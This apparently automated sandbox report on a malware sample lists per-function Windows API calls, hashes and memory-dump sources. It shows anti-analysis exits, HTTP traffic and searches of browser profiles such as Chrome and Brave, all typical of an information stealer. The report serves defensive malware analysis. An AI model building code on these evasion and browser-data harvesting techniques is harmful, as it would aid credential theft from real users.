                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00899BA0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                • Sleep.KERNEL32(00001770), ref: 00416B04
                                                • CloseHandle.KERNEL32(?,00000000,?,00899BA0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                • ExitProcess.KERNEL32 ref: 00416B22
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                • String ID:
                                                • API String ID: 3511611419-0
                                                • Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                                • Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                                                Control-flow Graph

                                                APIs
                                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ??2@$CrackInternetlstrlen
                                                • String ID: <
                                                • API String ID: 1683549937-4251816714
                                                • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                                • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1493 401220-401247 call 4189b0 GlobalMemoryStatusEx 1496 401273-40127a 1493->1496 1497 401249-401271 call 41da00 * 2 1493->1497 1498 401281-401285 1496->1498 1497->1498 1501 401287 1498->1501 1502 40129a-40129d 1498->1502 1504 401292-401294 ExitProcess 1501->1504 1505 401289-401290 1501->1505 1505->1502 1505->1504
                                                APIs
                                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                • __aulldiv.LIBCMT ref: 00401258
                                                • __aulldiv.LIBCMT ref: 00401266
                                                • ExitProcess.KERNEL32 ref: 00401294
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                • String ID: @
                                                • API String ID: 3404098578-2766056989
                                                • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                                • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1507 416af3 1508 416b0a 1507->1508 1510 416aba-416ad7 call 41aad0 OpenEventA 1508->1510 1511 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1508->1511 1517 416af5-416b04 CloseHandle Sleep 1510->1517 1518 416ad9-416af1 call 41aad0 CreateEventA 1510->1518 1517->1508 1518->1511
                                                APIs
                                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00899BA0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                • Sleep.KERNEL32(00001770), ref: 00416B04
                                                • CloseHandle.KERNEL32(?,00000000,?,00899BA0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                • ExitProcess.KERNEL32 ref: 00416B22
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                • String ID:
                                                • API String ID: 941982115-0
                                                • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                                • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                                APIs
                                                  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                  • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,008CAEB0), ref: 00406303
                                                  • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                  • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,008CA638,00000000,00000000,00400100,00000000), ref: 00406385
                                                  • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                  • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                • String ID: ERROR$ERROR
                                                • API String ID: 3287882509-2579291623
                                                • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                                • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocComputerNameProcess
                                                • String ID:
                                                • API String ID: 4203777966-0
                                                • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                                • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                • ExitProcess.KERNEL32 ref: 00401143
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$AllocCurrentExitNumaVirtual
                                                • String ID:
                                                • API String ID: 1103761159-0
                                                • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                                • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0089B36E
                                                • Module32First.KERNEL32(00000000,00000224), ref: 0089B38E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241173522.000000000089A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0089A000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_89a000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 3833638111-0
                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction ID: 77b64900f358692071377e86b58d0239e34d48d7da5eaa189ba1533dc0506448
                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction Fuzzy Hash: B1F06231500714ABDB207AF9A98DA6EB6E8FF49725F140528F646D21C0DB70E8459661
                                                APIs
                                                • SetErrorMode.KERNEL32(00000400,?,?,00810223,?,?), ref: 00810E19
                                                • SetErrorMode.KERNEL32(00000000,?,?,00810223,?,?), ref: 00810E1E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction ID: 38a33d7cf77271eff4fc9badce6bc49676e91161f5414cc284fa2bfc160f7c8c
                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction Fuzzy Hash: 5AD0123114512877DB002A95DC09BCD7B1CDF05B62F008411FB0DD9080C7B0998046E5
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Virtual$AllocFree
                                                • String ID:
                                                • API String ID: 2087232378-0
                                                • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                                • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                                APIs
                                                  • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                  • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                  • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                  • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                  • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                  • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                • ExitProcess.KERNEL32 ref: 004011C6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$Process$AllocName$ComputerExitUser
                                                • String ID:
                                                • API String ID: 1004333139-0
                                                • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                                • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0089B056
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241173522.000000000089A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0089A000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_89a000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction ID: 61ad45a6ac1bcd40f57640fb2f1fa2ec51acbbb090b678ae65f8c9da0458e28d
                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction Fuzzy Hash: 2B113C79A00208EFDB01DF98CA85E99BBF5EF08350F098094F9489B362D371EA50DF80
                                                APIs
                                                • wsprintfA.USER32 ref: 004138CC
                                                • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                                • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$P2#v$1#v
                                                • API String ID: 1125553467-1890188023
                                                • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                                • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                                APIs
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                                • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                                • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                                • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                • String ID: Brave$Google Chrome$P2#v$Preferences$\Brave\Preferences$1#v
                                                • API String ID: 3334442632-1392536997
                                                • Opcode ID: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                                • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                                • Opcode Fuzzy Hash: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                                • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                                APIs
                                                • wsprintfA.USER32 ref: 0041492C
                                                • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                • FindClose.KERNEL32(000000FF), ref: 00414B92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$File$CloseFirstNextwsprintf
                                                • String ID: %s\%s$%s\%s$%s\*$P2#v$1#v
                                                • API String ID: 180737720-322404123
                                                • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                                • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                • wsprintfA.USER32 ref: 004145A6
                                                • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                                • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                                • FindClose.KERNEL32(000000FF), ref: 004146A0
                                                • lstrcatA.KERNEL32(?,008CADE0,?,00000104), ref: 004146C5
                                                • lstrcatA.KERNEL32(?,008C9D40), ref: 004146D8
                                                • lstrlenA.KERNEL32(?), ref: 004146E5
                                                • lstrlenA.KERNEL32(?), ref: 004146F6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
